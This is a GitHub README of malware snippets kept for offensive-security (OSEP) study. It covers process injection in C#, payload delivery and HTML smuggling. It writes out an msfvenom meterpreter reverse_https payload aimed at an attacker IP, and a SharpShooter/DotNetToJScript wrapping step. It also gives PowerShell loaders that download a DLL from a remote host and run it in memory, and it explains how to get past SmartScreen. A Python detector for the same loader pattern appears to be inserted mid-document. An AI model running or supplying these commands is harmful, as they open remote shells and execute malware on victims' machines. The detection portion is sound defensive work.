1Gould/Malware-Snippets

Malware-Snippets

These are malware snippets for my OSEP studying / research.

C Sharp

These are all managed code.

C#:

  • BasicProcessInjection
  • AdvancedProcessInjection
  • NtInjection

Basic Process Injection

  • namespace Inject
  • OpenProcess
  • VirtualAllocEx
  • WriteProcessMemory
  • CreateRemoteThread

Advanced Process Injection (Exe/DLL)

  • GetCurrentProcess
  • NtCreateSection
  • Read/Write Memory in current process
  • NtMapViewOfSection
  • OpenProcess
  • Read/Execute Memory in remote process
  • NtMapViewOfSection
  • NtUnmapViewOfSection

SectionMapInjection (Exported Function to use reflectively)

  • Same technique as above.

Memory backed by a mapped section, unlike a private allocation, can also be viewed by other processes.

Execution

C Sharp + Jscript + PowerShell

For execution we have a few methods:

  • Build a C# console app, compile to DLL or Exe.
  • Build a C# console app for Jscript, COM Visible.
  • Build a C# Class Library, to reflect the DLL in memory.
  • Build a C# DLL with DllMain.

If we have a DLL compiled as a class library, we can reflect it into memory with PowerShell and then call a public method of the loaded assembly (DLL).

The key difference here is that DLLs programmed with a DllMain function can be loaded externally with LoadLibrary and trigger on DLL_PROCESS_ATTACH. These are known as unmanaged DLLs.

Compile to Jscript with DotNetToJScript.exe:

Cmd > .\DotNetToJScript.exe .\ExampleAssembly.dll --lang=Jscript --ver=v4 -o demo.js
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.13.37 LPORT=443 -f raw -o met.bin
$ python SharpShooter.py --dotnetver 4 --stageless --rawscfile met.bin --payload js --output evil

This tool can be used effectively with the HTML Smuggling technique.

On Disk:

(New-Object System.Net.WebClient).DownloadFile('http://IPhere/ClassLibrary1.dll', 'C:\Users\Public\library.dll')

$assem = [System.Reflection.Assembly]::LoadFile('C:\Users\Public\library.dll')

$class = $assem.GetType("Inject.TestClass")
$method = $class.GetMethod("Runner")
$method.Invoke(0, $null)

Compile to DLL and load with PowerShell from memory:

$data = (New-Object System.Net.WebClient).DownloadData('http://IPhere/ShellcodeRunner.dll')
$assem = [System.Reflection.Assembly]::Load($data)

# Namespace.Class
$class = $assem.GetType("ShellcodeRunner.Program")
$bindingFlags = [Reflection.BindingFlags] "NonPublic,Static"

# MethodName: Run
$method = $class.GetMethod("Run", $bindingFlags)
$method.Invoke(0, $null)
Or
$a = [ShellcodeRunner.Program]::Run()
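From a detection standpoint, the download-and-reflect pattern in the snippets above is exactly what PowerShell Script Block Logging (Event ID 4104) records. The following Python is an added example, not part of this repository: it scores constructed script-block text for that pattern and separates it from an ordinary on-disk assembly load; the indicator names, the threshold and the sample blocks are my own.

```python
import re
from dataclasses import dataclass, field

# (indicator name, pattern). Case-insensitive because PowerShell is.
INDICATORS = [
    ("remote_download", re.compile(r"Net\.WebClient\)\.Download(Data|File|String)\(", re.I)),
    ("assembly_load", re.compile(r"\[System\.Reflection\.Assembly\]::Load(File|From)?\(", re.I)),
    ("nonpublic_binding", re.compile(r'Reflection\.BindingFlags\]\s*"?[^"]*NonPublic', re.I)),
    ("reflective_invoke", re.compile(r"\.GetMethod\([^)]*\)[\s\S]*?\.Invoke\(", re.I)),
]

@dataclass
class Verdict:
    score: int
    hits: list = field(default_factory=list)

def score_script_block(text: str) -> Verdict:
    """Return which indicators fire on a single script block."""
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    return Verdict(score=len(hits), hits=hits)

def is_suspicious(text: str, threshold: int = 2) -> bool:
    """Assembly::Load plus at least one more indicator. Load alone is common in
    legitimate scripts (vendor assemblies loaded from disk), so it does not alert."""
    v = score_script_block(text)
    return "assembly_load" in v.hits and v.score >= threshold

# Constructed sample script-block text mirroring the in-memory loader above;
# the host name is a placeholder, not a real indicator.
SAMPLE_MALICIOUS = r"""
$data = (New-Object System.Net.WebClient).DownloadData('http://PLACEHOLDER-HOST/ShellcodeRunner.dll')
$assem = [System.Reflection.Assembly]::Load($data)
$class = $assem.GetType("ShellcodeRunner.Program")
$bindingFlags = [Reflection.BindingFlags] "NonPublic,Static"
$method = $class.GetMethod("Run", $bindingFlags)
$method.Invoke(0, $null)
"""

# Constructed benign sample: loads a vendor assembly from disk and calls it
# through normal static syntax, so only "assembly_load" fires.
SAMPLE_BENIGN = r"""
$smo = [System.Reflection.Assembly]::LoadFile('C:\Program Files\Vendor\Tool.dll')
[Vendor.Tool.Report]::Generate('C:\Reports\today.html')
"""

if __name__ == "__main__":
    for label, block in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, score_script_block(block), is_suspicious(block))
```

The on-disk variant (DownloadFile, LoadFile, GetMethod, Invoke) scores three indicators and is flagged as well.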

JS + HTML Smuggling

Just browsing the file will cause a trigger to download the executable. Unfortunately, a warning may be displayed due to the potentially unsafe file format.

Note that we chose to browse to the HTML file with Google Chrome since it supports window.URL.createObjectURL. This technique must be modified to work against browsers like Internet Explorer and Microsoft Edge.

The reason this happens is because the executable originated from a download through a browser. When that happens, it is marked as such in Windows and the SmartScreen feature tries to block execution. We must click More info followed by Run anyway to execute it.

Internet Explorer does not support URL.createObjectURL, so we can use msSaveBlob.
